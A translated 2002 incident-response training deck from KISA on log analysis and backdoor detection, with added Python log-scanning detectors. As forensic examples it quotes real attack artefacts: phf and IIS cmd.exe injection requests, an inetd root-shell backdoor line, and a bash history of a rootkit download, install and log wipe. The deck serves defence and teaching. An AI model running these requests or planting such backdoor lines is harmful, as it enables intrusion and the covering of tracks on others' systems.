2002. 10. 1  Jung Hyun-chul (hcjung@certcc.or.kr), Korea Information Security Agency (KISA), Hacking/Virus Consultation and Support Center

Contents
- Incident response procedure by phase
- Log analysis
- System file analysis
- Intrusion trace tracking & backdoor detection
- Incident response methods
- PGP
Incident response procedure by phase: Emergency Action Plan
- Phase 1: Preparation
- Phase 2: Identification
- Phase 3: Containment
- Phase 4: Eradication
- Phase 5: Recovery
- Phase 6: Follow-Up

Incident response procedure by phase: Emergency Action Plan
- Remain calm
- Take good notes: who, what, when, where, how and why
- Notify the right people and get help
- Enforce a need-to-know policy
- Use out-of-band communications (assume the intruder can read e-mail and sniff the network of the affected site)
- Contain the problem
- Make backups
- Get rid of the problem
- Get back in business
Phase 1: Preparation
- Select and organize the incident handling team members
- Include computer incident handling in the organization's disaster recovery plan
- Build an emergency contact list: IRT, firewall and IDS operators, vendors
- Education and training for team members
- Establish guidelines for cooperation between internal departments
- Maintain an interface with law enforcement and CIRT teams
- Kit to have ready: binary backup equipment, forensic software, fresh backup media, CDs with known-good binaries, hub, laptop, ...

Phase 2: Identification
- Assemble the team that will handle this incident
- Decide whether the event is actually an incident
- Notify the appropriate organizations and people: CEO, law enforcement, CIRT
- Ask the network service provider for help
- Handle evidence with care: maintain a chain of custody

Phase 3: Containment
- Keep the problem from getting worse
- Isolate the system from the network
- Take a binary (bit-for-bit) backup: dd, Ghost, drive duplicator
- Analyze the logs of neighboring systems as well
- Change passwords (if a sniffer is suspected, assume every password that crossed that network is known)
- Restrict Windows shares

Phase 4: Eradication
- Determine the cause and symptoms of the incident
- Strengthen countermeasures: defense in depth
- Vulnerability analysis
- Remove the cause of the incident
- Locate a clean backup taken before the intrusion (confirm it predates the compromise, not merely the detection)

Phase 5: Recovery
- Restore from backup, taking care not to reinstall malicious code
- Confirm that the system has returned to a normal state
- The system owner decides when to resume operation
- Monitor the system after it is brought back

Phase 6: Follow-Up
- Write the follow-up report
- Hold a follow-up meeting
- Log file analysis - Logs to analyze
- Router log
- Firewall log
- IDS log
- System log: UNIX (Linux, Solaris, HP-UX, AIX, IRIX, ...), Windows (Windows NT/2000, 95/98)
- Application log: web, FTP, sendmail, ...

- Log file analysis - Log file location by system
    Directory   UNIX variant
    /usr/adm    Korean main computer (주전산기) II, HP-UX
    /var/adm    Korean main computer (주전산기) III, Solaris, AIX
    /var/log    Linux, BSD
- Log file analysis - View /etc/syslog.conf
    # Log all kernel messages to the console.
    # Logging much else clutters up the screen.
    kern.*                                  /dev/console
    # modified by hcjung 5/15/2000
    *.*                                     @172.16.2.160
    # Log anything (except mail) of level info or higher.
    # Don't log private authentication messages!
    *.info;mail.none;authpriv.none          /var/log/messages
    # The authpriv file has restricted access.
    authpriv.*                              /var/log/secure
    # Everybody gets emergency messages, plus log them on another
    # machine.
    *.emerg                                 *
The "*.* @172.16.2.160" line forwards every message to a remote log host. An intruder who deletes the local files (as in the .bash_history shown later) cannot reach that copy, so read the remote host's logs first when the local ones look thin.
- Log file analysis - utmp(x)
- Information about currently logged-in users
- /var/run/utmp, /etc/utmp
- Binary file
- Commands that read utmp: who, w, whodo, users, finger
    # w
     9:11pm  up 6 days,  5:01,  5 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
    chief    pts/0    172.16.2.26       Mon10am  7:20m  0.19s  0.04s telnet xxx.xxx.150.39
    hcjung   pts/1    hcjung.kisa.or.k  5:59pm   0.00s  0.11s  0.01s w
    root     pts/3    -                 Thu 3pm  5days  0.02s  0.02s -sh
    jys      pts/6    172.16.2.159      Thu 7pm  5days  0.15s  0.04s sh ./vetescan xxx.125.110.21
Read the WHAT column: jys is running a scanning script against an outside host and chief has an outbound telnet session. utmp is an ordinary file, so a rootkit or log eraser can remove its own entry; a shell that appears in ps but has no session in w is itself a finding.

- Log file analysis - wtmp(x)
- Login and logout history of users
- System shutdown and boot records
- Binary file
- Command that reads wtmp: last
    # last
    rung     ttyp0    xxx.146.44.117   Thu Dec  9 20:47 - 20:57  (00:10)
    moof     ttyp2    98AE63EE.ipt.aol Thu Dec  9 19:24 - 19:30  (00:06)
    moof     ttyp2    98AE63EE.ipt.aol Thu Dec  9 19:23 - 19:24  (00:00)
    shinsh   ftp      ppp-ts1-port4.sa Sun Nov  7 00:13 - 00:15  (00:02)
    hspark   pts/2    147.46.76.171    Sat Nov  6 13:56 - 14:01  (00:05)
    moksoon  ftp      ts7-70t-18.idire Sat Nov  6 13:26 - 13:30  (00:03)
moof, which turns out to be an extra UID 0 account on the /etc/passwd slide below, logs in from a dial-up address; an unexplained gap in last output (the record starts abruptly at a recent date) means wtmp was truncated.
- Log file analysis - secure
- Security and authentication messages, in particular those from TCP Wrappers
    # tail -f /var/log/secure
    Apr 19 23:23:35 unsecure in.telnetd[645]: connect from 172.16.2.14
    Apr 19 23:23:41 unsecure login: LOGIN ON 2 BY hcjung FROM hcjung
    Apr 20 23:24:29 unsecure in.telnetd[1218]: refused connect from bluebird.certcc.or.kr
    Apr 20 23:25:27 unsecure in.telnetd[1219]: connect from 172.16.2.161
    Apr 20 23:25:33 unsecure login: LOGIN ON 3 BY hcjung FROM violet93
    Apr 20 23:27:18 unsecure in.telnetd[1247]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(hcjung.kisa.or.kr) failed
    Apr 20 23:27:18 unsecure in.telnetd[1247]: connect from 172.16.2.14
    Apr 20 23:27:43 unsecure login: LOGIN ON 4 BY hcjung FROM hcjung
    Apr 20 23:28:51 unsecure in.ftpd[1276]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(hcjung.kisa.or.kr) failed
    Apr 20 23:28:51 unsecure in.ftpd[1276]: connect from 172.16.2.14
"refused connect from" is tcpd rejecting a client under /etc/hosts.allow and /etc/hosts.deny; "can't verify hostname" is its forward/reverse DNS consistency check failing, which is worth a look because it is also what a spoofed reverse record produces.
- Log file analysis - loginlog
- Records failed login attempts (System V family)
- Not enabled by default; create the file and it starts recording:
    # touch /var/adm/loginlog
    # chown root /var/adm/loginlog
    # chmod 600 /var/adm/loginlog
    # tail -f /var/adm/loginlog
    hcjung:/dev/pts/9:Fri Apr 20 14:48:46 2001
    hcjung:/dev/pts/9:Fri Apr 20 14:48:54 2001
    hcjung:/dev/pts/9:Fri Apr 20 14:49:02 2001
    hcjung:/dev/pts/9:Fri Apr 20 14:49:11 2001
    hcjung:/dev/pts/9:Fri Apr 20 14:49:20 2001
Five failures for the same account within 34 seconds on one terminal is the pattern of password guessing.

- Log file analysis - sulog
- Records successful and failed su (substitute user) attempts
- The effective UID is changed to the UID of the target user
- The change of user is not reflected in utmp or wtmp, so sulog is the only record of who became root
    # tail -f /var/adm/sulog
    SU 04/17 16:18 + pts/10 informix-root
    SU 04/18 09:10 - pts/8 hcjung-root
    SU 04/18 09:10 - pts/8 hcjung-root
    SU 04/18 09:10 + pts/8 hcjung-root
Fields: date, time, + (success) or - (failure), terminal, from-user-to-user. Two failures followed by a success within the same minute is either a mistyped password or a guessed one; correlate with the terminal's login in wtmp.
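As an added example (not part of the original slides), the following Python turns the loginlog and sulog checks above into detection logic: it parses System V loginlog records and flags accounts with repeated failures inside a short window, and tallies failed su attempts to root by originating user. The sample records are constructed to mirror the slides; the window and threshold values are assumptions.

```python
"""Detect password-guessing bursts in loginlog and failed su-to-root in sulog.
Added example, not from the original slides; sample records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed loginlog sample: five failures for one account, ~8 s apart,
# plus one isolated failure for another account.
LOGINLOG = """\
hcjung:/dev/pts/9:Fri Apr 20 14:48:46 2001
hcjung:/dev/pts/9:Fri Apr 20 14:48:54 2001
hcjung:/dev/pts/9:Fri Apr 20 14:49:02 2001
hcjung:/dev/pts/9:Fri Apr 20 14:49:11 2001
hcjung:/dev/pts/9:Fri Apr 20 14:49:20 2001
chief:/dev/pts/2:Fri Apr 20 16:02:10 2001
"""

# Constructed sulog sample.  Field 4 is '+' for success and '-' for failure;
# the last field is from-user-to-user.
SULOG = """\
SU 04/17 16:18 + pts/10 informix-root
SU 04/18 09:10 - pts/8 hcjung-root
SU 04/18 09:10 - pts/8 hcjung-root
SU 04/18 09:10 + pts/8 hcjung-root
SU 04/18 11:40 - pts/3 rung-root
"""


def parse_loginlog(text):
    """Yield (user, tty, datetime) for each failed-login record."""
    for line in text.splitlines():
        if not line.strip():
            continue
        user, tty, stamp = line.split(":", 2)
        yield user, tty, datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y")


def login_bursts(text, threshold=3, window=timedelta(seconds=60)):
    """Return {user: max failures inside one sliding window} for users that
    reach the threshold; an isolated typo never triggers it."""
    by_user = defaultdict(list)
    for user, _tty, when in parse_loginlog(text):
        by_user[user].append(when)
    hits = {}
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[user] = max(count, hits.get(user, 0))
    return hits


def parse_sulog(text):
    """Yield (date, time, succeeded, tty, from_user, to_user) per record."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[0] != "SU":
            continue
        _tag, date, clock, flag, tty, who = parts
        src, _sep, dst = who.rpartition("-")
        yield date, clock, flag == "+", tty, src, dst


def failed_su_to_root(text):
    """Count failed su attempts whose target is root, keyed by source user.
    su is not recorded in utmp/wtmp, so sulog is the only trail."""
    counts = defaultdict(int)
    for _d, _t, ok, _tty, src, dst in parse_sulog(text):
        if dst == "root" and not ok:
            counts[src] += 1
    return dict(counts)


if __name__ == "__main__":
    print("login bursts:", login_bursts(LOGINLOG))
    print("failed su to root:", failed_su_to_root(SULOG))
```

The sliding window is deliberately per account and per file rather than per terminal, because a guesser who rotates terminals still hits the same account; to run it against a live host, read /var/adm/loginlog and /var/adm/sulog into the two functions in place of the constructed strings.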
- Log file analysis - xferlog
- Records file transfers through ftpd
- Enabled with the -l option in /etc/inetd.conf:
    ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
    Sat Apr 21 00:53:44 2001 1 violet93.kisa.or.kr 14859 /tmp/statdx2.c a _ i r root ftp 1 root c    (incoming)
    Sat Apr 21 00:54:09 2001 1 violet93.kisa.or.kr 821 /etc/passwd a _ o r root ftp 1 root c           (outgoing)
Fields after the timestamp: transfer time in seconds, remote host, bytes, file name, transfer type (a ascii / b binary), special action flag, direction (i incoming / o outgoing), access mode (r real user / a anonymous / g guest), user name, service, authentication method, authenticated user id, completion status (c complete / i incomplete). Here a C source file is uploaded into /tmp and /etc/passwd is downloaded 25 seconds later, both in an FTP session authenticated as root.
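An added example (not from the original slides) that decodes wu-ftpd xferlog records by field name and applies the three questions the slide raises: was a sensitive file downloaded, was source code or an archive dropped into a world-writable directory, and was the session run as root. The records are constructed after the slide; the directory, extension and sensitive-file lists are assumptions to tune per site.

```python
"""Decode wu-ftpd xferlog records and flag risky transfers.
Added example, not from the original slides; sample records are constructed."""
from datetime import datetime

# Constructed xferlog sample (the first two lines mirror the slide).
XFERLOG = """\
Sat Apr 21 00:53:44 2001 1 violet93.kisa.or.kr 14859 /tmp/statdx2.c a _ i r root ftp 1 root c
Sat Apr 21 00:54:09 2001 1 violet93.kisa.or.kr 821 /etc/passwd a _ o r root ftp 1 root c
Sat Apr 21 01:02:30 2001 3 ftp.example.net 40960 /pub/readme.txt a _ o a anonymous ftp 0 * c
"""

# Field names after the five-token timestamp, in xferlog order.
FIELDS = ("seconds", "host", "size", "path", "xfer_type", "special",
          "direction", "access", "user", "service", "auth_method",
          "auth_id", "status")

# Site-specific assumptions.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/master.passwd", "/.rhosts")
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/")
CODE_EXT = (".c", ".tar", ".tgz", ".gz", ".bz2", ".sh", ".pl")


def parse_xferlog(text):
    """Yield one dict per record.  wu-ftpd writes file names without spaces
    (spaces become '_'), so whitespace splitting is safe."""
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) != 5 + len(FIELDS):
            continue  # truncated or foreign line
        rec = dict(zip(FIELDS, tokens[5:]))
        rec["when"] = datetime.strptime(" ".join(tokens[:5]),
                                        "%a %b %d %H:%M:%S %Y")
        rec["size"] = int(rec["size"])
        yield rec


def reasons_for(rec):
    """Return the list of reasons a record deserves a second look."""
    out = []
    if rec["direction"] == "o" and rec["path"] in SENSITIVE:
        out.append("sensitive file downloaded")
    if (rec["direction"] == "i" and rec["path"].startswith(DROP_DIRS)
            and rec["path"].endswith(CODE_EXT)):
        out.append("source or archive uploaded to a world-writable directory")
    if rec["user"] == "root" or rec["auth_id"] == "root":
        out.append("ftp session as root")
    return out


def suspicious_transfers(text):
    """Return [(path, [reason, ...]), ...] for flagged records only."""
    flagged = []
    for rec in parse_xferlog(text):
        why = reasons_for(rec)
        if why:
            flagged.append((rec["path"], why))
    return flagged


if __name__ == "__main__":
    for path, why in suspicious_transfers(XFERLOG):
        print(path, "->", "; ".join(why))
```

Parsing from the left works only because the timestamp is always five tokens and the file name carries no spaces; if a server is configured to log the raw name, split from the right instead, since every field after the file name is fixed.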
- Log file analysis - ~/.history
- Records the commands the user executed
    # more ~/.bash_history
    mkdir ." "
    cd ." "
    ncftp ftp.tehcnotronic.com
    gunzip *.gz
    tar -xvf *.tar
    cd lrk4
    make all
    cd ..
    rm -Rf lrk4
    ncftp ftp.technotronic.com
    gunzip *.gz
    tar -xvf *.tar
    Ls
    rm lrk4.src.tar
    tar -xvf *.tar
    cd lrk4
    make install
    cd ..
    cd ..
    rm -Rf ." "
    pico /dev/ptyr
    mkdir /usr/sbin/mistake.dir
    rm /var/log/messages
    rm /var/log/wtmp
    touch /var/log/wtmp
    pico /etc/passwd
    reboot
    exit
Read as a story: the intruder creates a hidden working directory (a dot followed by a space), fetches and builds lrk4 (Linux Rootkit 4), installs it, edits a rootkit configuration file hidden under /dev (/dev/ptyr), wipes messages and wtmp, edits /etc/passwd and reboots. The history survived only because it was not cleared; a .bash_history that is empty, truncated, or symlinked to /dev/null on an account that is clearly in use is a finding in its own right.
- Log file analysis - messages
- Records the messages shown on the console
- Very large amount of information: kernel errors, reboot messages, login failures
- Reveals the attack technique used
- TIP: use grep (e.g. grep sadmind messages*)
    Apr 10 17:25:53 victim /usr/dt/bin/rpc.ttdbserverd[29906]: _Tt_file_system:: findbestmountpoint -- max_match_entry is null, aborting...
    Apr 10 17:25:54 victim inetd[147]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped
    Apr 10 17:26:03 victim /usr/dt/bin/rpc.ttdbserverd[8206]: iserase(): 78
    Apr 10 17:26:14 victim inetd[147]: /usr/sbin/sadmind: Bus Error - core dumped
    Apr 10 17:26:18 victim last message repeated 1 time
    Apr 10 17:26:21 victim inetd[147]: /usr/sbin/sadmind: Segmentation Fault - core dumped
    Apr 10 17:26:23 victim inetd[147]: /usr/sbin/sadmind: Hangup
    Apr 10 17:31:20 victim login: change password failure: No account present for user
    Apr 10 17:33:15 victim last message repeated 2 times
    Apr 10 17:40:30 victim inetd[147]: /usr/dt/bin/rpc.ttdbserverd: Killed
    Apr 10 17:40:30 victim inetd[147]: /usr/dt/bin/rpc.cmsd: Killed
A run of network daemons dying with "Segmentation Fault" or "Bus Error - core dumped" while inetd keeps restarting them is the signature of buffer-overflow exploit attempts against those services (here rpc.ttdbserverd and sadmind); the "Killed" lines a quarter of an hour later suggest the intruder, now inside, stopping the services to cover up. Remember that "last message repeated N times" hides N identical lines when counting attempts.

- Log file analysis - messages: amd attack signature and success
    messages.1:Mar 11 05:20:50 xxx <27>Mar 11 05:20:50 amd[468]: amq requested mount of [several hundred repeated non-printable bytes: filler/NOP sled and shellcode] ... 18 Jan 1998--str/bin/sh(-c)/bin/echo '2222 stream tcp nowait root /bin/sh s[...]
    [/tmp]# ls -l
    -rw-rw-rw-   1 root     root          116 Mar 11 05:20 h
    [/tmp]# more h
    2222 stream tcp nowait root /bin/sh sh -i
    2222 stream tcp nowait root /bin/sh sh -i
The overlong mount request is the exploit payload itself, and the readable tail of the message shows what it does: echo an inetd entry for a root shell on port 2222 into a file. The world-writable /tmp/h created in the same minute confirms the attempt succeeded; check inetd.conf and netstat for port 2222 next.
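An added example (not from the original deck) that does what the "TIP: use grep" bullet suggests, but with the two details a grep misses: it expands "last message repeated N times" so crash counts are right, and it flags messages containing non-printable bytes, which is how the amd shellcode above shows up in syslog. The sample lines are constructed after the slides, with the shellcode replaced by a short placeholder run of 0x90 bytes.

```python
"""Scan syslog 'messages'/'secure' lines for the attack signatures shown on
the preceding slides.  Added example, not from the original deck; the sample
lines are constructed after the slide excerpts (shellcode replaced by a short
placeholder run of non-printable bytes)."""
import re
from collections import Counter

SYSLOG = (
    "Apr 10 17:25:54 victim inetd[147]: /usr/dt/bin/rpc.ttdbserverd: Segmentation Fault - core dumped\n"
    "Apr 10 17:26:14 victim inetd[147]: /usr/sbin/sadmind: Bus Error - core dumped\n"
    "Apr 10 17:26:18 victim last message repeated 1 time\n"
    "Apr 10 17:26:21 victim inetd[147]: /usr/sbin/sadmind: Segmentation Fault - core dumped\n"
    "Apr 20 23:24:29 unsecure in.telnetd[1218]: refused connect from bluebird.certcc.or.kr\n"
    "Apr 20 23:25:27 unsecure in.telnetd[1219]: connect from 172.16.2.161\n"
    "Mar 11 05:20:50 xxx amd[468]: amq requested mount of " + "\x90" * 16
    + "/bin/sh -c /bin/echo '2222 stream tcp nowait root /bin/sh sh -i' >/tmp/h\n"
)

ENTRY = re.compile(r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) (?P<rest>.*)$")
PROG = re.compile(r"^(?P<prog>[^:\[\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
REPEAT = re.compile(r"^last message repeated (\d+) times?$")
CRASH = re.compile(r"^(?P<bin>/\S+): (?:Segmentation Fault|Bus Error)")
REFUSED = re.compile(r"refused connect from (?P<peer>\S+)")
NONPRINT = re.compile(r"[^\x20-\x7e]")

RULES = (
    ("daemon crash (overflow attempt?)", CRASH, "bin"),
    ("tcp_wrappers refused connection", REFUSED, "peer"),
)


def parse_syslog(text):
    """Yield (ts, host, prog, msg).  'last message repeated N times' is
    expanded into N copies of the preceding entry (keeping its timestamp),
    so a count of attempts is not silently low."""
    prev = None
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        rep = REPEAT.match(m.group("rest"))
        if rep:
            if prev is not None:
                for _ in range(int(rep.group(1))):
                    yield prev
            continue
        pm = PROG.match(m.group("rest"))
        if not pm:
            continue
        prev = (m.group("ts"), m.group("host"), pm.group("prog"), pm.group("msg"))
        yield prev


def detect(text):
    """Return [(ts, rule, detail), ...]; detail is the crashed binary, the
    refused peer, or the program that logged binary garbage."""
    hits = []
    for ts, _host, prog, msg in parse_syslog(text):
        for rule, rx, group in RULES:
            m = rx.search(msg)
            if m:
                hits.append((ts, rule, m.group(group)))
        if NONPRINT.search(msg):
            hits.append((ts, "non-printable bytes in message (shellcode?)", prog))
    return hits


def tally(text):
    """Count hits by (rule, detail): which service was hammered, by whom."""
    return Counter((rule, detail) for _ts, rule, detail in detect(text))


if __name__ == "__main__":
    for key, n in tally(SYSLOG).most_common():
        print(n, key)
```

The expanded repeats carry the timestamp of the line they copy, which is what syslog actually collapsed; if you need the later time for a timeline, keep the repeat line's own timestamp alongside it.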
- Log file analysis - access_log / error_log
- Web service logs
- Detect CGI vulnerability scans and attacks
    xxx.xxx.xxx.xxx - - [16/Jun/1998:10:38:02 +0900] "GET /cgi-bin/phf?qname=root%0acat%20/etc/passwd HTTP/1.1" 200 114873
    xxx.xxx.xxx.xxx - - [16/Jun/1998:20:11:47 +0900] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 114889
    xxx.xxx.xxx.xxx - - [17/Jun/1998:15:37:11 +0900] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 114889
    xxx.xxx.xxx.xxx - - [18/Jun/1998:09:56:49 +0900] "GET /cgi-bin/phf/?qalias=x%0acat%20/etc/passwd HTTP/1.1" 200 114884
The %0a (newline) inside the phf query string is the command-injection technique; a 200 status with a response body of about 114 KB, repeated on three days, indicates the injected cat ran and returned the password file rather than an error page.

- Log file analysis (Windows) - IIS log
- Logs of Microsoft IIS services (Web, FTP, Gopher)
- C:\WINNT\System32\LogFiles
    2001-05-01 16:25:44 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir+..\ 200
    2001-05-01 16:25:45 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/..\../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502
    2001-05-01 16:25:49 128.163.197.4 - xxx.xxx.139.225 80 GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor%3dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3d100%^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d7+color%3dred^>fuck+usa+government^</font^>^<tr^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d7+color%3dred^>fuck+poizonbox^<tr^>^<td^>^<p+align%3d%22center%22^>^<font+size%3d4+color%3dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp 502 -
Three steps five seconds apart: directory traversal out of /scripts to run cmd.exe (status 200, it worked), a copy of cmd.exe to root.exe inside the scripts directory so it can be called directly, then root.exe used to write a defacement page over index.asp. Do not read the 502 as failure: cmd.exe output is not a well-formed CGI response, so IIS reports 502 even when the command ran. Check for root.exe and the modified index.asp on disk.
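An added example (not from the original deck) that scans both log formats on the two preceding slides for the same attack patterns: Apache common log format for the phf newline injection, and the IIS W3C extended format for the traversal and cmd.exe/root.exe requests. The sample lines are constructed after the slides with documentation addresses; the indicator list is an assumption to extend per site.

```python
"""Scan Apache (common log format) and IIS (W3C extended) web logs for the CGI
and traversal attacks shown on the preceding slides.  Added example, not part
of the original deck; the sample lines are constructed after the slides."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: two Apache lines, two IIS lines (raw string so the
# backslashes stay exactly as the attacker sent them).
SAMPLE_LOG = r"""
203.0.113.7 - - [16/Jun/1998:20:11:47 +0900] "GET /cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 114889
203.0.113.7 - - [16/Jun/1998:20:12:03 +0900] "GET /index.html HTTP/1.0" 200 2326
2001-05-01 16:25:44 198.51.100.4 - 192.0.2.25 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir+..\ 200
2001-05-01 16:25:45 198.51.100.4 - 192.0.2.25 80 GET /scripts/..\../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502
"""

APACHE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+')
IIS_DATE = re.compile(r"^\d{4}-\d{2}-\d{2}$")

# Each test runs on the percent-decoded, lower-cased request target.
INDICATORS = (
    ("newline injection (phf-style command execution)", lambda t: "\n" in t),
    ("directory traversal", lambda t: "../" in t or "..\\" in t),
    ("command shell invoked via web server", lambda t: "cmd.exe" in t or "root.exe" in t),
    ("password file requested", lambda t: "/etc/passwd" in t),
)


def parse_line(line):
    """Return (client_ip, request_target, status) or None for other lines."""
    m = APACHE.match(line)
    if m:
        return m.group("ip"), m.group("target"), int(m.group("status"))
    t = line.split()
    if len(t) >= 10 and IIS_DATE.match(t[0]):
        # date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
        target = t[7] if t[8] == "-" else t[7] + "?" + t[8]
        return t[2], target, int(t[9])
    return None


def scan_web_log(text):
    """Return [(client_ip, status, [indicator, ...]), ...] for hits only.
    Status is reported, not used to decide: IIS answers 502 to cmd.exe
    requests that actually ran."""
    hits = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, target, status = parsed
        decoded = unquote(target).lower()
        matched = [name for name, test in INDICATORS if test(decoded)]
        if matched:
            hits.append((ip, status, matched))
    return hits


def offenders(text):
    """Flagged requests per client IP; a scanner shows up as a high count."""
    return Counter(ip for ip, _status, _ind in scan_web_log(text))


if __name__ == "__main__":
    for ip, status, why in scan_web_log(SAMPLE_LOG):
        print(ip, status, "; ".join(why))
    print(dict(offenders(SAMPLE_LOG)))
```

Decoding once with unquote is enough for these samples; double-encoded or overlong UTF-8 traversal sequences are a separate case and are not claimed to be covered here.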
- Log file analysis (Windows) - IIS log (screenshot slide)

- Log file analysis (Windows) - Event Log
- Administrative Tools -> User Manager -> Policies -> Audit
- Nothing appears in the Security log until an audit policy is enabled here; on a default NT installation the log is empty

- Log file analysis (Windows) - Event Log (screenshot slide)
- System file analysis - Files to examine
- /etc/passwd, /etc/shadow
- /etc/rc*
- /var/spool/cron, /etc/crontab, /etc/cron.d/
- /etc/services
- /etc/inetd.conf

- System file analysis - /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2:daemon:/sbin:
    meteor:x:501:100::/:/bin/csh
    chief:x:502:502::/home/chief:/bin/bash
    hcjung:x:503:503::/home/hcjung:/bin/bash
    moof:x:0:0::/:/bin/bash
    rung:x:501:501::/home/rung:/bin/bash
What to look for: moof has UID 0, that is, a second root account under another name; meteor and rung share UID 501; meteor and moof have / as home directory. Compare with the wtmp output earlier, where moof logs in from a dial-up host.
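An added example (not from the original deck) that applies the /etc/passwd checks above mechanically, so they are not missed on a file with hundreds of accounts: extra UID 0 users, duplicate UIDs, empty password fields and a home directory of /. The sample is constructed after the slide with one extra line (guest) to exercise the empty-password check; treating only "root" as the legitimate UID 0 account is an assumption.

```python
"""Audit /etc/passwd for the backdoor accounts shown on the slide.
Added example, not from the original deck; the sample passwd is constructed
after the slide plus one extra entry (guest) with an empty password field."""

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
meteor:x:501:100::/:/bin/csh
chief:x:502:502::/home/chief:/bin/bash
hcjung:x:503:503::/home/hcjung:/bin/bash
moof:x:0:0::/:/bin/bash
rung:x:501:501::/home/rung:/bin/bash
guest::504:504::/home/guest:/bin/sh
"""

EXPECTED_ROOT = ("root",)      # assumption: only 'root' may hold UID 0


def parse_passwd(text):
    """Yield (user, pw, uid, gid, gecos, home, shell) with uid/gid as int.
    Malformed lines are yielded with uid None so the auditor can report them."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            yield (line, None, None, None, None, None, None)
            continue
        yield (f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6])


def audit_passwd(text):
    """Return [(user, finding), ...] in file order."""
    findings = []
    first_with_uid = {}
    for user, pw, uid, _gid, _gecos, home, _shell in parse_passwd(text):
        if uid is None:
            findings.append((user, "malformed entry"))
            continue
        if uid == 0 and user not in EXPECTED_ROOT:
            findings.append((user, "uid 0 account other than root"))
        elif uid in first_with_uid:
            findings.append((user, f"duplicate uid {uid} (also {first_with_uid[uid]})"))
        first_with_uid.setdefault(uid, user)
        if pw == "":
            findings.append((user, "empty password field (login without password)"))
        if home == "/" and user not in EXPECTED_ROOT:
            findings.append((user, "home directory is /"))
    return findings


def uid0_accounts(text):
    """Every account that is effectively root, sorted by name."""
    return sorted(u for u, _p, uid, *_rest in parse_passwd(text) if uid == 0)


if __name__ == "__main__":
    for user, why in audit_passwd(PASSWD):
        print(f"{user}: {why}")
```

Run the same audit on /etc/shadow's companion file for accounts whose password field is "x" here but empty there; the check above only sees what passwd itself exposes.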
- System file analysis - /etc/rc.d/*
    ... (omitted)
            rm -f /dev/fb
            ln -s $fbdev /dev/fb
        fi
    fi
    # Name Server Cache Daemon..
    /usr/sbin/nscd -q
    #td start
    /usr/src/.puta/td
A line appended to a startup script that launches a program from a hidden directory (/usr/src/.puta) restarts the backdoor on every boot; diff the rc scripts against the distribution's originals or a known-good copy rather than reading them by eye.

- System file analysis - /etc/inetd.conf
    ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
    telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
    #
    # Shell, login, exec, comsat and talk are BSD protocols.
    #
    shell   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
    #login  stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind
    exec    stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd
    2222    stream  tcp  nowait  root  /bin/bash       bash -i
The last line binds an interactive root shell to TCP port 2222: a numeric port instead of a service name, no tcpd wrapper, and a shell as the server program are each a warning sign on their own.
- Intrusion trace tracking & backdoor detection - Hacking tools found during damage analysis
- Backdoors such as rootkits
- Sniffers
- Vulnerability scanners
- Exploit code
- DoS attack tools
- Log erasers
- IRC bots
- ...

- Intrusion trace tracking & backdoor detection - Hidden files & directories
- "..." (dot dot dot), "  " (space space), "..  " (dot dot space space)
- Special characters used as directory names so that they are overlooked in ls output
- chattr changes file attributes: with the immutable (+i) attribute set, even root cannot delete the file; lsattr shows the attribute and chattr -i clears it

- Intrusion trace tracking & backdoor detection - find
- -ctime n: status changed n*24 hours ago
    find / -ctime 10 -ls        (use -ctime -10 for "within the last 10 days")
- -type c: file is of type c
    find /dev -type f -ls       (regular files under /dev: rootkit configuration files hide there)
- -user uname: file is owned by user uname
    find / -user bad_guy -ls
- -perm mode: files with the given permission bits
